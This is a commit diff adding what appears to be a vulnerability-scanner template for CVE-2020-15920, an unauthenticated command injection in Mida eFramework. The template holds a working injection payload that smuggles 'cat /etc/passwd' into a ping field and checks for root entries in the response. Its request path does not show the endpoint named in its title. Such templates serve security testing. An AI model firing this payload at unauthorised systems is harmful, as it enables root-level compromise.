commit
4b8fb4774f
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-15920
|
||||
|
||||
info:
|
||||
name: Unauthenticated RCE at Mida eFramework on 'PDC/ajaxreq.php'
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required.
|
||||
|
||||
# References:
|
||||
# - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
Loading…
Reference in New Issue